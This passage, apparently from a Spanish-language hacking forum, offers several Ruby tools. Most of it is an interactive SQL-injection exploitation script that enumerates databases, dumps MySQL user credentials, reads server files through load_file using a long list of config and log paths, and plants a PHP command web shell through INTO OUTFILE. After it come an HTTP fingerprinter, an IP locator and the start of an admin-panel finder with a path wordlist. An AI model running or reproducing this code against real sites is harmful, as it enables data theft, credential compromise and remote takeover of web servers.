ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog']

def toma(web)
  begin
    return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  rescue
    return "Error"
  end
end

def decode_hex(text)
  text = text.sub("0x","")
  return [text].pack('H*')[0]
end

def encode_hex(text)
  return "0x"+text.unpack('H*')[0]
end

def copyright()
  print "\n-- == (C) Doddy Hackman 2015 == --\n"
  gets.chomp
  exit(1)
end

def installer()
  dir = Dir::pwd+"/"+"logs_webs"
  if not FileTest::directory?(dir)
    Dir::mkdir(dir)
  end
end

def savefile(file,text)
  url = URI.parse(file)
  save = File.open("logs_webs/"+url.host+".txt","a")
  save.puts text+"\n"
  save.close
end

def bypass(op)
  if op=="--"
    return "+","--"
  elsif op=="/*"
   return "/**/","/**/"
  elsif op=="%20"
   return "%20","%00"
  else
   return "+","--"   
  end
end

def head()
  clean()
  print "
 
@      @@   @             
@@     @  @ @@             
@ @@  @  @  @ @   @ @ @@@
@ @   @  @  @@ @ @@@ @  @
@@    @  @  @  @  @   @@@
@ @   @  @  @  @  @  @  @
@@@ @   @@   @@@  @@@ @@@@@

"
end

def volverinicio()
  print "\n\n[+] Press any key to continue\n\n"
  gets.chomp
  inicio()
end

def clean()
  if RUBY_PLATFORM=~/win/ or RUBY_PLATFORM=~/min/
    system("cls")
  else
    system("clear")
  end
end

def retorno(url,by)
  print "\n[+] Finished"
  print "\n\n[+] Press any key to continue\n\n"
  gets.chomp
  central(url,by)
end

def gettables(url,by)
  pass1,pass2 = bypass(by)
  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))")
  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
  print "\n[+] Getting tables ...\n\n"
  code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  if code1=~/K0BRA(.*?)K0BRA/
    total = $1
    print "[+] Tables Found : ",total,"\n\n"
    savefile(url,"\n[+] Tables Found : #{total}\n")
    for num in ("17"..total)
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+num+",1"+pass2)
      if code2=~/K0BRA(.*?)K0BRA/
        table = $1
        print "[+] Table Found : "+table+"\n"
        savefile(url,"[+] Table Found : #{table}")
      end
    end
  else
    print "[-] Not Found\n"
  end
end

def getcolumns(url,by,tablex)
  tablexa = encode_hex(tablex)
  pass1,pass2 = bypass(by)
  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))")
  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
  print "\n[+] Getting columns ...\n\n"
  code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass2)
  if code1=~/K0BRA(.*?)K0BRA/
    total = $1
    print "[+] Columns Found : ",total,"\n\n"
    savefile(url,"\n[+] Table : #{tablex}")
    savefile(url,"[+] Columns Found : #{total}\n")
    for num in ("0"..total)
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass1+"limit"+pass1+num+",1"+pass2)
      if code2=~/K0BRA(.*?)K0BRA/
        table = $1
        print "[+] Column Found : "+table+"\n"
        savefile(url,"[+] Column Found : #{table}")
      end
    end
  else
    print "[-] Not Found\n"
  end
end

def getdbs(url,by)
  pass1,pass2 = bypass(by)
  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))")
  print "\n[+] Getting DBS ...\n\n"
  code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
  if code1=~/K0BRA(.*?)K0BRA/
    total = $1
    print "[+] DBS Found : ",total,"\n\n"
    savefile(url,"\n[+] DBS Found : #{total}\n")
    for num in ("0"..total)
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+num+",1"+pass2)
      if code2=~/K0BRA(.*?)K0BRA/
        table = $1
        print "[+] DB Found : "+table+"\n"
        savefile(url,"[+] DB Found : #{table}")
      end
    end
  else
    print "[-] Not Found\n"
  end
end

def gettablesbydb(url,by,dbx)
  data  = encode_hex(dbx)
  pass1,pass2 = bypass(by)
  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
  print "\n[+] Getting tables ...\n\n"
  code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass2)
  if code1=~/K0BRA(.*?)K0BRA/
    total = $1
    print "[+] Tables Found : ",total,"\n\n"
    savefile(url,"\n[+] DBS : #{dbx}")
    savefile(url,"[+] Tables Found : #{total}\n")
    for num in ("0"..total)
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
      if code2=~/K0BRA(.*?)K0BRA/
        table = $1
        print "[+] Table Found : "+table+"\n"
        savefile(url,"[+] Table Found : #{table}")
      end
    end
  else
    print "[-] Not Found\n"
  end
end

def getcolumnsbydb(url,by,db,tab)
  data = encode_hex(db)
  tabx = encode_hex(tab)
 
  pass1,pass2 = bypass(by)
  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
  print "\n[+] Getting columns ...\n\n"
  code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass2)
  if code1=~/K0BRA(.*?)K0BRA/
    total = $1
    print "[+] Columns Found : ",total,"\n\n"
    savefile(url,"\n[+] DB : #{db}")
    savefile(url,"[+] Table : #{tab}")
    savefile(url,"[+] Columns Found : #{total}\n")
    for num in ("0"..total)
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
      if code2=~/K0BRA(.*?)K0BRA/
        table = $1
        print "[+] Column Found : "+table+"\n"
        savefile(url,"[+] Column Found : #{table}")
      end
    end
  else
    print "[-] Not Found\n"
  end
end

def mysqluser(url,by)
  pass1,pass2 = bypass(by)
  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))")
   print "\n[+] Searching mysql.user\n\n"
  code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  if code1=~/K0BRA(.*?)K0BRA/
    total = $1
    print "[+] Users Mysql Found : ",total,"\n\n"
    savefile(url,"[+] Users Mysql Found : "+total+"\n")
    for num in ("0"..total)
      code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+num+",1"+pass2)
      if code2=~/K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2/
        host,user,passw = $1,$2,$3
        print "[Host] : "+host
        print " [User] : "+user
        print " [Pass] : "+passw+"\n"   
        savefile(url,"[Host] : "+host)
        savefile(url,"[User] : "+user)
        savefile(url,"[Pass] : "+passw+"\n")
      end
    end
  else
    print "[-] Not Found\n"
  end
end

def details(url,by)
  pass1,pass2 = bypass(by)
  hextest = "0x2f6574632f706173737764" #/etc/passwd
  hextest = "0x633A2F78616D70702F726561642E747874" #c:/xampp/read.txt
  web1 = url.sub(/hackman/,"0x4b30425241")
  web2 = url.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)")
  web3 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))")
   print "\n[+] Extrating information of the DB\n"
  code1 = toma(web2)
  if code1=~/K0BRA(.*)K0BRA(.*)K0BRA(.*)K0BRA/
    user,data,ver = $1,$2,$3
    print "\n[+] Username : "+user
    print "\n[+] Database : "+data
    print "\n[+] Version : "+ver+"\n\n"
    savefile(url,"\n[+] Username : "+user)
    savefile(url,"[+] Database : "+data)
    savefile(url,"[+] Version : "+ver+"\n")
  else
    print "[-] Not Found\n"
  end
   code2 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
   code3 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
   code4 = toma(web3)
   if code2=~/K0BRA/
     print "[+] Mysql User : ON\n"
     savefile(url,"[+] Mysqluser : ON")
   end
   if code3=~/K0BRA/
     print "[+] information_schema : ON\n"
     savefile(url,"[+] information_schema : ON")
   end
   if code4=~/ERTOR854/
     print "[+] load_file : ON\n"
     savefile(url,"[+] load_file : ON")
   end   
   savefile(url,"") #espacio en blanco
end

def dumper(url,by,table,col1,col2)
  pass1,pass2 = bypass(by)
  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,"+col2+",0x4b30425241)))")
  print "\n[+] Getting Values ...\n\n"
  code1 = toma(web1+pass1+"from"+pass1+table+pass2)
  if code1=~/K0BRA(.*?)K0BRA/
    total = $1
    savefile(url,"\n[+] Table : "+table)
    savefile(url,"[+] Column 1 : "+col1)
    savefile(url,"[+] Column 2 : "+col2)
    print "[+] Values Found : ",total,"\n"
    savefile(url,"\n[+] Values Found : #{total}\n")
    for num in ("0"..total)
      code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+num+",1"+pass2)
      if code2=~/K0BRA(.*)K0BRA(.*)K0BRA/
        uno,dos = $1,$2
        print "\n[+] "+col1+" : "+uno+"\n"
        print "[+] "+col2+" : "+dos+"\n"
        savefile(url,"\n[+] "+col1+" : "+uno)
        savefile(url,"[+] "+col2+" : "+dos)
      end
    end
  else
    print "[-] Not Found\n"
  end
end

def fuzzfile(url,by)
  pass1,pass2 = bypass(by)
  print "\n[+] Fuzzing Files with load_file ....\n"
  $files.each do |file|
    res = file
    file = file.chomp
    file = encode_hex(file)
    web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
    code = toma(web1)
    if code=~/ERTOR854(.*?)ERTOR854/m
      print "\n\n[File Found] : ",res
      print "\n\n[Source Start]\n"
      print $1
      print "\n[Source End]"
      savefile(url,"\n[File Found] : "+res)
      savefile(url,"\n[Source Start]\n")
      savefile(url,$1)
      savefile(url,"\n[Source End]")
    end   
  end
  print "\n"
end

def abrirfile(url,by,file)
  pass1,pass2 = bypass(by)
  print "\n[+] Opening file ....\n"
  res = file
  file = encode_hex(file)
    web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
    code = toma(web1)
    if code=~/ERTOR854(.*?)ERTOR854/m
      print "\n\n[File Found] : ",res
      print "\n\n[Source Start]\n"
      print $1
      print "\n[Source End]\n"
      savefile(url,"\n[File Found] : "+res)
      savefile(url,"\n[Source Start]\n")
      savefile(url,$1)
      savefile(url,"\n[Source End]\n")
    else
      print "\n\n[-] Error\n\n"
    end
       
end

def into(url,by,full,dir)
  pass1,pass2 = bypass(by)
  linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
  lugar = full+"/cmd.php"
  lugardos = dir+"/cmd.php"
  h = URI.parse(url)
  webtest = "http://"+h.host+lugardos
  web1 = url.sub(/hackman/,linea)
  formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2
  toma(formandoweb)
  code = toma(webtest)
  if code=~/Mini Shell By Doddy/
    print "\n[Shell Up] : "+webtest+"\n"
    savefile(url,"\n[Shell Up] : "+webtest+"\n")
  else
    print "\n\n[-] Error\n"
  end
end

def central(url,by)
  clean()
  head()
  print "\n\n[+] Page : #{url}\n"
  print "[+] ByPass : #{by}\n\n"

  print "\n[information_schema]\n\n"
  print "1 - Show tables\n"
  print "2 - Show columns of the a table\n"
  print "3 - Show databases\n"
  print "4 - Show tables from the a DB\n"
  print "5 - Show columns from the a table of the DB\n"
  print "\n[mysql.user]\n\n"
  print "6 - Show users\n"
  print "\n[Others]\n\n"
  print "7 - Show details\n"
  print "8 - Dump data\n"
  print "9 - Fuzz Files with load_file\n"
  print "10 - Load files with load_file\n"
  print "11 - Create Shell\n"
  print "12 - Show log\n"
  print "13 - Change target\n"
  print "14 - Exit\n\n\n"
 
  print "[+] Option : "
  op = gets.chomp
  print "\n"
   
  if op == "1"
    gettables(url,by)
    retorno(url,by)
  elsif op == "2"
    print "\n[+] Table : "
    table = gets.chomp
    getcolumns(url,by,table)
    retorno(url,by)
  elsif op == "3"
    getdbs(url,by)
    retorno(url,by)
  elsif op == "4"
    print "\n[+] DB : "
    db = gets.chomp
    gettablesbydb(url,by,db)
    retorno(url,by)
  elsif op == "5"
    print "\n[+] DB : "
    db = gets.chomp
    print "\n[+] Table : "
    tab = gets.chomp
    getcolumnsbydb(url,by,db,tab)
    retorno(url,by)
  elsif op == "6"
    mysqluser(url,by)
    retorno(url,by)
  elsif op == "7"
    details(url,by)
    retorno(url,by)
  elsif op == "8"
    print "\n[+] Table : "
    table = gets.chomp
    print "\n[+] Column 1 : "
    col1 = gets.chomp
    print "\n[+] Column 2 : "
    col2 = gets.chomp
    dumper(url,by,table,col1,col2)
    retorno(url,by)
  elsif op == "9"
    fuzzfile(url,by)
    retorno(url,by)
  elsif op == "10"
    print "\n[+] File : "
    file = gets.chomp
    abrirfile(url,by,file)
    retorno(url,by)
  elsif op == "11"
    print "\n[Full Source Discloure] : "
    full = gets.chomp
    print "\n[Directory to test] : "
    dir = gets.chomp
    into(url,by,full,dir)
    retorno(url,by)
  elsif op == "12"
    urla = URI.parse(url)
    ar = "logs_webs/"+urla.host+".txt"
    system("start #{ar}")
    retorno(url,by)
  elsif op == "13"
    inicio()
  elsif op == "14"
    copyright()
  else
    retorno(url,by)
  end
end

def findlength(url,by)
  pass1,pass2 = bypass(by)
  z = "1"
  print "\n[+] Finding columns lenght ...\n\n"
  x = "concat(0x4b30425241,1,0x4b30425241)"
  for num in ('2'..'25')
    z = z+","+num
    x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)"
    code = toma(url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+x)
    if code=~/K0BRA(.*?)K0BRA/
      print "[+] The Page has "+num+" columns\n"
      print "[+] The number "+$1+" print data"
      z = z.sub($1,"hackman")
      sqli = url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+z
      savefile(url,"[+] SQLI : "+sqli)
      savefile(url,"[+] Bypass : "+by+"\n")
      central(sqli,by)
    end
  end
  print "[-] Columns lenght not found\n"
  volverinicio()
end

def testvul(page,by)
  pass1,pass2 = bypass(by)
  print "\n\n[+] Testing vulnerability ...\n\n"
  codeuno = toma(page+"1"+pass1+"and"+pass1+"1=0"+pass2)
  codedos = toma(page+"1"+pass1+"and"+pass1+"1=1"+pass2)
  if codeuno != codedos
    print "[+] Vulnerable !\n"
    findlength(page,by)
  else
    print "[-] Not vulnerable\n"
    print "\n[+] Scan anyway y/n : "
    op = gets.chomp
    if op == "y"
      findlength(page,by)
    else
      volverinicio()
  end
end 
end

def inicio()
  clean()
  head()
  print "\n\n[+] Page : "
  page = gets.chomp
  print "\n[+] Bypass : "
  by = gets.chomp
  if page=~/hackman/
    central(page,by)
  else
    testvul(page,by)
  end
end

installer()
inicio()

# The End ?

  
  Eso es todo.

Un simple script en Ruby para hacer HTTP FingerPrinting.

Version consola :

Código (ruby) [Seleccionar] Expandir


#!usr/bin/ruby
#HTTP FingerPrinting 0.2
#(C) Doddy Hackman 2015

require "net/http"

# Functions

def httpfinger(page)
respuesta = ""
begin
nave = Net::HTTP.start(page)
headers = nave.head("/")
headers.each do |name,value|
respuesta = respuesta + "[+] "+name+" : "+value+"\n"
end
nave.finish
rescue
respuesta = "Error"
end
return respuesta
end

def uso
print "\n[+] Sintax : ruby httpfinger.rb <target>\n"
end

def  head
print "\n-- == HTTP FingerPrinting 0.2 == --\n\n"
end

def copyright
print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
end

#

target = ARGV[0]

head()

if !target
uso()
else
print "\n[+] Searching ...\n\n"
print httpfinger(target)
print "\n[+] Finished\n"
end

copyright()

#The End ?


Version Tk :

Código (ruby) [Seleccionar] Expandir


#!usr/bin/ruby
#HTTP FingerPrinting 0.2
#(C) Doddy Hackman 2015

require "tk"
require "net/http"

# Functions

def httpfinger(page)
respuesta = ""
begin
nave = Net::HTTP.start(page)
headers = nave.head("/")
headers.each do |name,value|
respuesta = respuesta + "[+] "+name+" : "+value+"\n"
end
nave.finish
rescue
respuesta = "Error"
end
return respuesta
end

#

window = TkRoot.new { title "HTTP FingerPrinting 0.2 Coded By Doddy H" ; background "black" }
window['geometry'] = '300x300-20+10'

TkLabel.new(window) do
background "black"
foreground "cyan"
text "    Target : "
place('relx'=>"0.1",'rely'=>"0.1")
end

target = TkEntry.new(window){
background "black"
foreground "cyan"
width 25
place('relx'=>0.3,'rely'=>0.1)
}

TkLabel.new(window) do
background "black"
foreground "cyan"
text "Console"
place('relx'=>0.4,'rely'=>0.2)
end

console =TkText.new(window) do
background "black"
foreground "cyan"
width 30
height 10
place('relx'=>0.1,'rely'=>0.3)
end

TkButton.new(window) do
text "Search"
        background "black"
foreground "cyan"
width 17
activebackground "cyan"
highlightbackground  "cyan"
command proc{
target = target.value.to_s
console.insert("end","[+] Searching ...\n\n")
console.insert("end",httpfinger(target))
console.insert("end","\n[+] Finished")
}
place('relx'=>0.3,'rely'=>0.9)
end

Tk.mainloop

#The End ?


Una imagen :



Eso es todo.

Un simple script en Ruby para localizar una IP y sus DNS.

Version consola :

Código (ruby) [Seleccionar] Expandir


#!usr/bin/ruby
#LocateIP 0.3
#(C) Doddy Hackman 2015

require "open-uri"
require "net/http" 
require "resolv"

# Functions

def get_ip(hostname)
begin
return Resolv.getaddress(hostname)
rescue
return "Error"
end
end

def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end

def response_code(web)
begin
return Net::HTTP.get_response(URI(web)) .code
rescue
return "404"
end
end

def tomar(web,arg)
begin
headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
uri = URI(web)
http = Net::HTTP.new(uri.host, uri.port)
return http.post(uri.path,arg, headers).body
rescue
return "Error"
end
end

def uso
print "\n[+] Sintax : ruby locateip.rb <target>\n"
end

def  head
print "\n\n-- == LocateIP 0.3 == --\n\n"
end

def copyright
print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
end

def locateip(target)

print "\n[+] Getting IP ...\n"

ip = get_ip(target)

print "\n[+] IP : "+ip+"\n"

web = "http://www.melissadata.com/lookups/iplocation.asp"
print "\n[+] Locating ...\n\n"

code = tomar(web,"ipaddress="+ip+"&btn=Submit")

if code=~/City<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
print "[+] City : "+$2+"\n"
else
print "[+] City : Not Found\n"
end

if code=~/Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
print "[+] Country : "+$2+"\n"
else
print "[+] Country : Not Found\n"
end

if code=~/State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
print "[+] State or Region : "+$2+"\n";
else
print "[+] State of Region : Not Found\n"
end

print "\n[+] Getting DNS ...\n\n"

control = "0"

code = toma("http://www.ip-adress.com/reverse_ip/"+ip)

dnss = code.scan(/whois\/(.*?)\">Whois/)

dnss.flatten.each do |dns|
begin
if dns != ""
control = "1"
print "[+] DNS Found : "+dns
end
end
end

if control=="0"
print "\n[-] DNS Not Found\n"
end
end

target = ARGV[0]

head()

if !target
uso()
else
locateip(target)
end

copyright()

#The End ?


Version Tk :

Código (ruby) [Seleccionar] Expandir


#!usr/bin/ruby
#LocateIP 0.3
#(C) Doddy Hackman 2015

require "tk"
require "open-uri"
require "net/http"
require "resolv"

# Functions

def get_ip(hostname)
begin
return Resolv.getaddress(hostname)
rescue
return "Error"
end
end

def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end

def response_code(web)
begin
return Net::HTTP.get_response(URI(web)) .code
rescue
return "404"
end
end

def tomar(web,arg)
begin
headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
uri = URI(web)
http = Net::HTTP.new(uri.host, uri.port)
return http.post(uri.path,arg, headers).body
rescue
return "Error"
end
end

#

window = TkRoot.new { title "LocateIP 0.3 (C) Doddy Hackman 2015" ; background "black" }
window['geometry'] = '300x300-20+10'

TkLabel.new(window) do
background "black"
foreground "yellow"
text "    Target : "
place('relx'=>"0.1",'rely'=>"0.1")
end

target = TkEntry.new(window){
background "black"
foreground "yellow"
width 25
place('relx'=>0.3,'rely'=>0.1)
}

TkLabel.new(window) do
background "black"
foreground "yellow"
text "Console"
place('relx'=>0.4,'rely'=>0.2)
end

console =TkText.new(window) do
background "black"
foreground "yellow"
width 30
height 10
place('relx'=>0.1,'rely'=>0.3)
end

TkButton.new(window) do
text "Search"
        background "black"
foreground "yellow"
width 17
activebackground "yellow"
highlightbackground  "yellow"
command proc{

target = target.value.to_s

console.insert("end",  "[+] Getting IP ...\n")

ip = get_ip(target)

web = "http://www.melissadata.com/lookups/iplocation.asp"

console.insert("end", "\n[+] Locating ...\n\n")

code = tomar(web,"ipaddress="+ip+"&btn=Submit")

if code=~/City<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
console.insert("end", "[+] City : "+$2+"\n")
else
console.insert("end", "[+] City : Not Found\n")
end

if code=~/Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
console.insert("end","[+] Country : "+$2+"\n")
else
console.insert("end", "[+] Country : Not Found\n")
end

if code=~/State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
console.insert("end", "[+] State or Region : "+$2+"\n")
else
console.insert("end","[+] State of Region : Not Found\n")
end

console.insert("end","\n[+] Getting DNS ...\n\n")

control = "0"

code = toma("http://www.ip-adress.com/reverse_ip/"+ip)

dnss = code.scan(/whois\/(.*?)\">Whois/)

dnss.flatten.each do |dns|
begin
if dns != ""
control = "1"
console.insert("end", "[+] DNS Found : "+dns)
end
end
end

if control=="0"
console.insert("end","\n[-] DNS Not Found\n")
end

console.insert("end","\n\n[+] Finished")

}
place('relx'=>0.3,'rely'=>0.9)
end

Tk.mainloop

#The End ?


Una imagen :



Eso es todo.

Un simple script en Ruby para buscar el panel de administracion de una pagina.

Version consola :

Código (ruby) [Seleccionar] Expandir


#!usr/bin/ruby
#PanelFinder 0.5
#(C) Doddy Hackman 2015

require "open-uri"
require "net/http" 

# Functions

def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end

def response_code(web)
begin
return Net::HTTP.get_response(URI(web)) .code
rescue
return "404"
end
end

def tomar(web,arg)
begin
headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
uri = URI(web)
http = Net::HTTP.new(uri.host, uri.port)
return http.post(uri.path,arg, headers).body
rescue
return "Error"
end
end

def find_panel(page)
panels = ['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.p